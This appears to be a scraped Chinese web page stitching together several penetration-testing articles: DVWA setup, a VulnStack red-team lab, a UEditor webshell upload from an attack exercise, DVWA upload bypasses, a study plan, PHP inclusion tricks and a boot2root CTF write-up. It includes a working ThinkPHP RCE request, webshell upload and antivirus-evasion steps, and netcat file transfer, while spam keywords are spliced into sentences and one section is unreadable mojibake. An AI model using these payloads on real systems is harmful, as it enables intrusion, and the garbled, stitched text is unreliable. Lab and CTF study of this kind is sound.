1.【DVWA实战篇】2分钟学会DVWA及如何安装
2.ATT&CK实战| VulnStack红队(五)
3.记某次攻防演练:大战UEditor并突破
4.DVWA 文件上传漏洞渗透实践
5.webå®å
¨è¦å¦ä»ä¹
6.盘点那些渗透测试中的实战渗透奇*技巧
【DVWA实战篇】2分钟学会DVWA及如何安装
学习渗透测试时,寻找适合练习的源码靶机环境往往让人感到困扰。不同的实战渗透漏洞通常需要不同靶机源码,而不同源码的源码Web架构各不相同,因此构建能够涵盖所有Web渗透技巧的实战渗透靶机环境,常常需要搭建多个Web站点,源码多多猫插件源码这无疑增加了学习的实战渗透入门门槛。 DVWA(Damn Vulnerable Web Application)是源码一个专门为安全专业人员提供合法练习环境的PHP/MySQL Web应用,旨在帮助Web开发者更深入地理解Web应用安全防范的实战渗透过程。DVWA包含了十个攻击模块,源码包括但不限于:暴力破解、实战渗透命令行注入、源码跨站请求伪造、实战渗透文件包含、源码文件上传、实战渗透不安全的验证码、SQL注入(盲注)、反射型跨站脚本、存储型跨站脚本。这些模块涵盖了OWASP TOP中的所有攻击漏洞,提供了一个一站式的Web渗透学习环境。DVWA的安全级别可手动调整,分为从低到高的五个等级:Low、Medium、High、Impossible。级别越高的防护越严格,渗透难度也越大。低级别靶机基本没有防护或只有最简单的防护,很容易被渗透;中级防护使用了一些粗糙的防护措施,需要使用者懂得绕过防护;高级防护会大大提高防护级别,一般需要丰富经验才能成功渗透;Impossible级别几乎无法渗透,常用作生产环境Web防护的最佳参考。 安装DVWA需要PHP和MySQL运行环境,PHPStudy是一个集成LAMP和WAMP架构的PHP调试环境程序,支持Windows和Linux,操作简便,一元夺宝机器人源码无需配置即可使用。以Windows Server R2 X系统为例,通过下载PHPStudy和DVWA的源码,按照以下步骤进行安装:下载PHPStudy和DVWA的最新版本。
运行PHPStudy安装程序,选择非C盘的安装目录,如D:\phpstudy。
等待解压完成,确保未遇到安装错误,如有则需安装VC、VC运行库。
点击启动按钮,直到显示Apache和MySQL已启动,表明PHPStudy安装成功。
完成PHPStudy的安装后,开始安装DVWA:解压下载的DVWA-master.zip文件,并将文件夹重命名为DVWA。
将DVWA文件夹复制到PHPStudy的默认Web站点根目录。
在DVWA配置目录下修改config.inc.php文件,将数据库管理员密码从默认的P@ssw0rd更改为root或自定义密码。
使用浏览器访问安装页面,输入本地IP地址作为URL,通常为本机IP地址,如.../dvwa/set...。
在安装页面点击按钮创建数据库,成功后登录页面会显示提示信息。
使用默认用户admin和密码password登录,进入渗透练习页面。
设置DVWA的安全级别,通常默认为Impossible,可以根据需要调整。
至此,DVWA已经安装完毕,可以开始进行Web渗透的练习。若需还原至初始状态,只需重新创建数据库即可。瓜子二手车源码ATT&CK实战| VulnStack红队(五)
红日安全团队新项目启程,聚焦于深入理解漏洞与自学能力提升,我们自主搭建靶场并编写系列攻防文档。文档需包含信息收集、漏洞挖掘(至少两种Web漏洞、主机或中间件漏洞)、代码审计(审计一种相关漏洞)、主机信息收集、提权等内容。项目最后提交包括靶场、工作点(WP)、设计题目思路图。Web小组现在招募,欢迎挑战自我、自学能力突出的伙伴加入。
环境设置:Win7 +phpstudy+thinkphp(5.0.);IP:...、...、...;攻击机IP:...。
外网渗透策略:访问...,目录扫描发现robots.txt和add.php后门。利用爆破工具尝试入侵,也可利用RCE漏洞,通过输入错误页面查看thinkphp版本号并找到对应的漏洞利用代码。
RCE执行命令示例:.../?...\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami。
代码审计分析:发现RCE漏洞payload、5.0.x补丁位置及漏洞源码分析,通过URL路由检测、parseUrl函数和routeCheck函数流程追踪,理解漏洞触发原理。
漏洞利用详细步骤:1. 漏洞POC与框架URL处理相关,跟踪到URL路由检测函数;2. $dispatch为空,执行routeCheck函数,路径变量$path为index/think\app/invokefunction;3. 结果为false,执行parseUrl函数;4. parseUrl函数转换路径,并传入routeCheck函数;5. 通过routeCheck执行系统命令。
内网渗透流程:1. 主机信息收集,最新美化版代刷网源码通过arp信息发现同网段主机;2. 域控IP识别,ping域名sun.com获取域控IP;3. 横向移动,使用cs工具攻击域控,创建监听器、生成木马并执行;4. 提权,利用cs方法获得系统权限,读取域管理员密码;5. 扫描内网,基于IPC共享登录主机;6. 通过已经上线的主机作为监听器,让无法出网的dc主机上线。
项目总结:红日安全团队新项目旨在深入学习Web安全漏洞,提供一个自主搭建的靶场环境,编写攻防文档,同时招募喜欢挑战自我、自学能力强的伙伴加入。项目涵盖从外网渗透到内网横向移动的全过程,包含代码审计与提权等高级技术,旨在提升成员的实战能力。
更多安全课程资源:访问qiyuanxuetang.net/cours...
记某次攻防演练:大战UEditor并突破
参与某次攻防演练,目标单位存在公开的域名备案信息。通过FOFA搜索,发现该单位存在端口的开放子域名,启动渗透流程。目录扫描后,发现/bin.rar路径可以访问到一个压缩文件,下载解压缩后,初步判断为.NET形式的站点源代码,使用C#语言编写。进一步分析dll文件的命名规则和.NET格式,判断出主要的后端逻辑代码位于xxx.Application.Web.dll文件中。为了解读二进制dll文件,使用dnspy进行反编译。为帮助网安学习者,提供一套免费资料包,包括网安学习路径思维导图、工具包、SRC分析报告、港式5张棋牌源码资源网攻防实战技术电子书、CISSP认证资料、CTF实战技巧、大厂面试题集、客户端安全检测指南等。
源码中发现使用UEditor。UEditor的路径为/Utility/UEditor/controller.ashx。尝试访问关键接口,发现返回错误,可能由于WAF或EDR拦截。通过Fuzz方法,发现通过访问/Utility/UEditor/.css?action=catchimage可以绕过拦截,成功访问关键接口。利用UEditor .net版本的任意文件上传漏洞,上传哥斯拉jsp webshell。漏洞利用参考链接:freebuf.com/vuls/...。在上传过程中遇到杀软拦截,使用github.com/Tas9er/ByPas...项目对webshell进行免杀处理,最终成功上传并连接,完成UEditor站点的利用。接下来,通过愉快地打内网进行后续操作。
传统的UEditor利用方式通常需要本地编写HTML文件,包含表单以提交马地址至目标服务器。不过,原理基于HTTP请求发送马地址,因此可以直接在Burp Suite中发送请求达到相同效果,省去制作HTML文件的步骤。请求发送后,服务器返回webshell路径。总结,攻防演练过程中,通过信息收集、渗透测试、代码分析、利用漏洞等步骤,成功完成目标系统的利用,展示了攻防技术的实战应用。
DVWA 文件上传漏洞渗透实践
本文所有渗透实验均在靶机上进行,仅供学习网络安全之用,请勿攻击未经允许的网站。法律法规详情请参阅《中华人民共和国网络安全法》。
文件上传漏洞是Web应用中的常见安全问题。若Web应用未对上传内容进行合理过滤或检测,用户可通过绕过限制上传恶意程序文件,引发严重后果。
实验准备包括获取靶机IP地址并登录系统。使用Xshell操作或在Kali中配置BurpSuite与靶机交互。选择"Dann Vulnerable Web Application"作为目标。
实验中,OWASP提供了三种安全模式。尝试"low"级别,上传与PHP文件皆成功。查看源码发现代码仅设置了路径,无其他防护措施。
"mid"级别添加MIME类型判断,非规定类型和大小无法上传。尝试修改类型为"image/jpeg",需借助BurpSuite代理工具拦截并修改内容类型后发送,成功上传PHP文件。
在"high"级别下,代码限制了文件后缀,仅通过修改类型无法绕过。使用BurpSuite拦截时,将文件后缀改为"shell2.php.jpg",仅能部分成功。此时需采用文件包含木马渗透方式。
通过edjpgcom工具将PHP代码嵌入到中,上传后显示成功。但单纯上传不构成木马,需执行嵌入代码进行操作。在"File Inclusion"中执行代码,检查后确认文件成功创建。
使用Xshell验证文件存在,通过蚁剑等工具进行增删改查等操作,实现对网站的全面控制。此过程展示了从低到高不同安全级别的文件上传漏洞实验过程。
总结,通过对DVWA网站的实验,深入了解了文件上传漏洞的原理、不同安全级别的应对策略及其实现方式。此实践强调了安全代码的重要性与针对性防御措施的必要性。
webå®å ¨è¦å¦ä»ä¹
å¦ä¹ Webå®å ¨éè¦ææ¡Webå®å ¨ç¸å ³æ¦å¿µãæ¸éæµè¯ç¸å ³å·¥å ·ãæ¸éå®ææä½ãçæWindows/Kali Linuxãä¸é´ä»¶åæå¡å¨çå®å ¨é ç½®ãèæ¬ç¼ç¨å¦ä¹ ãæºç 审计ä¸æ¼æ´åæãå®å ¨ä½ç³»è®¾è®¡ä¸å¼åççãç®ååä¸ä¸ªå¦ä¹ è§åï¼
第ä¸æ¥ï¼Webå®å ¨ç¸å ³æ¦å¿µ
建议å¦ä¹ æ¶é´ï¼2å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãçæåºæ¬æ¦å¿µ(SQLæ³¨å ¥ãä¸ä¼ ãXSSãCSRFãä¸å¥è¯æ¨é©¬ç)ã
2ãéè¿å ³é®å(SQLæ³¨å ¥ãä¸ä¼ ãXSSãCSRFãä¸å¥è¯æ¨é©¬ç)è¿è¡Googleã
3ãé 读ãWebå®å ¨æ·±åº¦åæãï¼ä½ä¸ºå ¥é¨å¦ä¹ è¿æ¯å¯ä»¥çã
4ãçä¸äºæ¸éç¬è®°/è§é¢ï¼äºè§£æ¸éå®æçæ´ä¸ªè¿ç¨ï¼å¯ä»¥Google(æ¸éç¬è®°ãæ¸éè¿ç¨ãå ¥ä¾µè¿ç¨ç)ã
第äºæ¥ï¼çææ¸éç¸å ³å·¥å ·
建议å¦ä¹ æ¶é´ï¼3å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãçæAWVSãSqlmapãBurpsuiteãNessusãChina chopper ãNmapãAppscançç¸å ³å·¥å ·ç使ç¨ã
2ãäºè§£è¯¥ç±»å·¥å ·çç¨éå使ç¨åºæ¯ã
3ãä¸è½½æ åé¨ççè¿äºè½¯ä»¶è¿è¡å®è£ ã
4ãå¦ä¹ 并è¿è¡ä½¿ç¨ï¼å ·ä½ææå¯ä»¥å¨ç½ä¸æç´¢ï¼ä¾å¦ï¼Burpsuiteçæç¨ãSqlmapã
5ã常ç¨çè¿å 个软件é½å¦ä¼åï¼å¯ä»¥å®è£ é³éå¯å¨åä¸ä¸ªæ¸éå·¥å ·ç®±
第ä¸æ¥ï¼æ¸éå®ææä½
建议å¦ä¹ æ¶é´ï¼5å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãææ¡æ¸éçæ´ä¸ªé¶æ®µå¹¶è½å¤ç¬ç«æ¸éå°åç«ç¹ã
2ãç½ä¸æ¾æ¸éè§é¢ç并æèå ¶ä¸çæè·¯ååçï¼å ³é®å(æ¸éãSQLæ³¨å ¥è§é¢ãæ件ä¸ä¼ å ¥ä¾µãæ°æ®åºå¤ä»½ãDedecmsæ¼æ´å©ç¨çç)ã
3ãèªå·±æ¾ç«ç¹/æ建æµè¯ç¯å¢è¿è¡æµè¯ï¼è®°ä½è¯·éèå¥½ä½ èªå·±ã
4ãæèæ¸é主è¦å为å 个é¶æ®µï¼æ¯ä¸ªé¶æ®µéè¦ååªäºå·¥ä½ï¼ä¾å¦è¿ä¸ªï¼PTESæ¸éæµè¯æ§è¡æ åã
5ãç 究SQLæ³¨å ¥çç§ç±»ãæ³¨å ¥åçãæå¨æ³¨å ¥æå·§ã
6ãç 究æ件ä¸ä¼ çåçï¼å¦ä½è¿è¡æªæã解ææ¼æ´å©ç¨çï¼åç §ï¼ä¸ä¼ æ»å»æ¡æ¶ã
7ãç 究XSSå½¢æçåçåç§ç±»ï¼å ·ä½å¦ä¹ æ¹æ³å¯ä»¥Googleã
8ãç 究Windows/Linuxææçæ¹æ³åå ·ä½ä½¿ç¨ï¼å¯ä»¥åèï¼ææã
9ãå¯ä»¥åè: å¼æºæ¸éæµè¯è弱系ç»ã
第åæ¥ï¼å ³æ³¨å®å ¨åå¨æ
建议å¦ä¹ æ¶é´ï¼1å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãå ³æ³¨å®å ¨åçææ°æ¼æ´ãå®å ¨äºä»¶ä¸ææ¯æç« ã
2ãæµè§æ¯æ¥çå®å ¨ææ¯æç« /äºä»¶ã
3ãéè¿å¾®åãå¾®ä¿¡å ³æ³¨å®å ¨åçä»ä¸äººå(éå°å¤§ççå ³æ³¨æè 好åææå ³æ³¨)ï¼å¤©å¤©æ½æ¶é´å·ä¸ä¸ã
4ãéè¿feedly/é²æ订é å½å å¤å®å ¨ææ¯å客(ä¸è¦ä» éäºå½å ï¼å¹³æ¶å¤æ³¨æ积累)ã
5ãå »æä¹ æ¯ï¼æ¯å¤©ä¸»å¨æ交å®å ¨ææ¯æç« é¾æ¥å°iæ¥ç§ç¤¾åºè¿è¡ç§¯æ·ã
6ãå¤å ³æ³¨ä¸ææ°æ¼æ´å表ï¼å¯ä»¥ççhackeroneãfreebufãå®å ¨å®¢çï¼éå°å ¬å¼çæ¼æ´é½å»å®è·µä¸ã
7ãå ³æ³¨å½å å½é ä¸çå®å ¨ä¼è®®çè®®é¢æè å½åã
8ãå å ¥ææ¯äº¤æµç¾¤ï¼ä¸ç¾¤å 大佬们讨æä¸äºç»éªåæå·§ã
第äºæ¥ï¼çæWindows/Kali Linux
建议å¦ä¹ æ¶é´ï¼3å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãå¦ä¹ Windows/Kali Linuxåºæ¬å½ä»¤ã常ç¨å·¥å ·ã
2ãçæWindowsä¸ç常ç¨çcmdå½ä»¤ï¼ä¾å¦ï¼ipconfig,nslookup,tracert,net,tasklist,taskkillçã
3ãçæLinuxä¸ç常ç¨å½ä»¤ï¼ä¾å¦ï¼ifconfig,ls,cp,mv,vi,wget,service,sudoçã
4ãçæKali Linuxç³»ç»ä¸ç常ç¨å·¥å ·ï¼å¯ä»¥åèãWeb Penetration Testing with Kali LinuxãããHacking with Kaliãçã
5ãçæmetasploitå·¥å ·ï¼å¯ä»¥åèãMetasploitæ¸éæµè¯æåãã
第å æ¥ï¼ä¸é´ä»¶åæå¡å¨çå®å ¨é ç½®
建议å¦ä¹ æ¶é´ï¼3å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãå¦ä¹ æå¡å¨ç¯å¢é ç½®ï¼å¹¶è½éè¿æèåç°é ç½®åå¨çå®å ¨é®é¢ã
2ãWindows serverç¯å¢ä¸çIISé ç½®ï¼ç¹å«æ³¨æé ç½®å®å ¨åè¿è¡æéã
3ãLinuxç¯å¢ä¸çLAMPçå®å ¨é ç½®ï¼ä¸»è¦èèè¿è¡æéãè·¨ç®å½ãæ件夹æéçã
4ãè¿ç¨ç³»ç»å åºï¼éå¶ç¨æ·ååå£ä»¤ç»éï¼éè¿iptableséå¶ç«¯å£ï¼é 置软件Wafå 强系ç»å®å ¨ï¼å¨æå¡å¨é ç½®mod_securityçç³»ç»ã
5ãéè¿Nessus软件对é ç½®ç¯å¢è¿è¡å®å ¨æ£æµï¼åç°æªç¥å®å ¨å¨èã
第ä¸æ¥ï¼èæ¬ç¼ç¨å¦ä¹
建议å¦ä¹ æ¶é´ï¼4å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãéæ©èæ¬è¯è¨ï¼Perl/Python/PHP/Go/Javaä¸çä¸ç§ï¼å¯¹å¸¸ç¨åºè¿è¡ç¼ç¨å¦ä¹ ã
2ãæ建å¼åç¯å¢åéæ©IDEï¼PHPç¯å¢æ¨èWampåXAMPPï¼IDE强çæ¨èSublimeã
3ãPythonç¼ç¨å¦ä¹ ï¼å¦ä¹ å 容å å«ï¼è¯æ³ãæ£åãæ件ãç½ç»ãå¤çº¿ç¨ç常ç¨åºï¼æ¨èãPythonæ ¸å¿ç¼ç¨ãã
4ãç¨Pythonç¼åæ¼æ´çexpï¼ç¶ååä¸ä¸ªç®åçç½ç»ç¬è«ã
5ãPHPåºæ¬è¯æ³å¦ä¹ 并书åä¸ä¸ªç®åçå客系ç»ï¼åè§ãPHPä¸MySQLç¨åºè®¾è®¡(第4ç)ããè§é¢ã
6ãçæMVCæ¶æï¼å¹¶è¯çå¦ä¹ ä¸ä¸ªPHPæ¡æ¶æè Pythonæ¡æ¶(å¯é)ã
7ãäºè§£Bootstrapçå¸å±æè CSSã
ç¬¬å «æ¥ï¼æºç 审计ä¸æ¼æ´åæ
建议å¦ä¹ æ¶é´ï¼3å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãè½ç¬ç«åæèæ¬æºç ç¨åºå¹¶åç°å®å ¨é®é¢ã
2ãçææºç 审计çå¨æåéææ¹æ³ï¼å¹¶ç¥éå¦ä½å»åæç¨åºã
3ãäºè§£Webæ¼æ´çå½¢æåå ï¼ç¶åéè¿å ³é®åè¿è¡æ¥æ¾åæã
4ãç 究Webæ¼æ´å½¢æåçåå¦ä½ä»æºç å±é¢é¿å 该类æ¼æ´ï¼å¹¶æ´çæchecklistã
å¦ä¹ å°åï¼iæ¥ç§å®ç½ï¼ä¼å®æ®¿ï¼
第ä¹æ¥ï¼å®å ¨ä½ç³»è®¾è®¡ä¸å¼å
建议å¦ä¹ æ¶é´ï¼5å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãè½å»ºç«èªå·±çå®å ¨ä½ç³»ï¼å¹¶è½æåºä¸äºå®å ¨å»ºè®®æè ç³»ç»æ¶æã
2ãå¼åä¸äºå®ç¨çå®å ¨å°å·¥å ·å¹¶å¼æºï¼ä½ç°ä¸ªäººå®åã
3ã建ç«èªå·±çå®å ¨ä½ç³»ï¼å¯¹å ¬å¸å®å ¨æèªå·±çä¸äºè®¤è¯åè§è§£ã
4ãæåºæè å å ¥å¤§åå®å ¨ç³»ç»çæ¶ææè å¼åã
盘点那些渗透测试中的奇*技巧
总结下渗透测试中的一些小技巧,仅做总结。
0x php文件包含姿势
这类姿势国外黑阔早有总结,比如包含上传的文件,当然文件可控。利用php封装协议php://input和data://,包含post数据造成php命令执行,当然allow_url_include选项需要打开。包含log文件也是可以,当我们提交恶意代码时也会被记录,于是包含记录了恶意代码的log文件是个好主意。包含/proc/self/environ文件:这需要PHP运行作为一个具有cgion/proc伪文件的系统且PHP脚本有权访问这些伪文件。包含会话文件需要攻击者能控制会话中的任何字符串值(注入代码,例如phpinfo(),会话文件必须存放在serializedsession文件且PHP脚本能够访问会话文件(通常是/tmp/ sess_SESSIONID文件)。包含其他由php应用创建的文件,只要你能想到的,都可以尝试创建然后包含他,比如数据库文件,缓存文件,应用程序级别的日志。
0x .htaccess文件突破黑名单解析
因为是黑名单,自定义.htaccess上传,内容为test.jpg文件,没有扩展名,内容是一句话,这个时候就成功绕过。
0x php流封装绕过截断
主要利用了PHP的一个流封装特性,可以参考PHP官方文档中的Example #3。假设存在文件包含的代码,但%无法截断,只能包含 xxxx.html.php。首先新建hello.html.php,内容为phpinfo();然后压缩成zip,结构如下图。然后访问网址,成功包含压缩文件内的hello.html.php。把我们输入的变量和include后面的变量合起来就是zip://test.zip#hello.html.php,代表当前目录下的test.zip压缩包里面的hello.html.php,于是包含成功。
0x 通用防注入系统getshell
相信许多朋友渗透测试都遇到过这种情况,系统做了数据提交记录,通过阅读类似程序的源码得知数据记录在sqlin.asp。于是想到直接提交一句话木马,但没有成功。提交and 1= ,通过菜刀连接sqlin.php即可。
0x iis+php黑名单上传突破
在php+window+iis环境下,双引号(“>”)等价于点号(“.”),大于符号(“>”)等价于问号(“?”),小于符号(“<“)等价于星号(“*”)。虽然有这么多好玩的东西,但这特性只能用于文件上传时覆盖已知的文件,于是这特性便略显鸡肋。但通过一系列的测试发现,P牛已经给出完美利用的方法。首先利用特殊办法生成一个php文件,然后再利用该特性将文件覆盖。可问题来了,怎样生成php文件呢?如果可以直接生成php文件的话,干嘛还要利用那什么特性?别急,办法总是有的。我们知道在文件上传时,我们往往会考虑到文件名截断,如%等。对!有的人可能还会用冒号(“:”)去截断,如:bypass.php:jpg。但你知道吗?冒号截断产生的文件是空白的,里面并不会有任何的内容。虽然生成的php文件里面没有内容,但是php文件总生成了吧,所以我们可以结合上面所说的特性完美成功利用。按照上面提供的思路,实现本地测试地址:/entry/derpn...。难度中等(CTF)。这是一台基于Ubuntu的boot2root虚拟机,适用于模拟早期OSCP实验室的机器,且含一些小挑战。强调经典黑客方法,详细描述所有操作。
目标:获取所有4个标志,以达到完整root访问权限。
开始打靶,使用命令arp-scan -l扫描目标靶机的IP地址,发现与kali同一c段。使用nmap -sS -sV -T5 -A -p- ..0.进行端口扫描,发现开放、、端口。尝试通过端口访问,使用dirb爆破,发现大量目录。利用命令dirb ..0./ -w快速爆破内容。
访问端口,查看源代码以获取flag1:flag1(EAEDF6AD7D0BB8AF4F9F1AACC3F0ECBAD6E)。根据爆破结果访问后台登录页面,意外发现无需爆破密码即可登录,使用命令:python -c 'import pty; pty.spawn("/bin/bash")'获取交互式shell。进一步发现正在运行mysql,使用命令:ps aux | grep mysql确认。
在之前爆破的目录中找到mysql登录信息,登录后发现flag2和用户unclestinky的密码。使用Rockyou.txt字典破解密码,命令:echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC' >>/tmp/hash9.hash,执行命令解压字典文件:gzip -d /usr/share/wordlists/rockyou.txt.gz。破解后尝试登录unclestinky账户。
在home目录下找到mrderp和stinky用户名。尝试SSH登录端口,发现需要使用指纹密钥。在network-logs目录下找到一个包含管理员修改密码的对话文件,翻译得知SSH密钥路径。保存密钥并登录,解决报错后在desktop目录找到flag3。
在documents目录中发现derpissues.pcap文件,使用Wireshark分析。命令:kali上 nc -lvvp > derpissues.pcap,靶机上 nc -nv ..0. < derpissues.pcap。通过过滤找到密码derpderpderpderpderpderpderp,用于SSH登录mrderp账户。在Desktop目录中找到helpdesk.log文件,命令:cat Desktop/helpdesk.log,提示允许mrderp以root权限读写执行/home/mrderp/binaries/目录下derpy开头的文件。
使用sudo -l命令显示权限,创建目录binaries并使用echo命令创建shell文件derpy.sh,赋予最高权限后用sudo命令执行,成功获取flag4。这台靶机较为复杂,耗时两天完成,涉及多种渗透测试知识与技巧。欢迎关注,一同进步。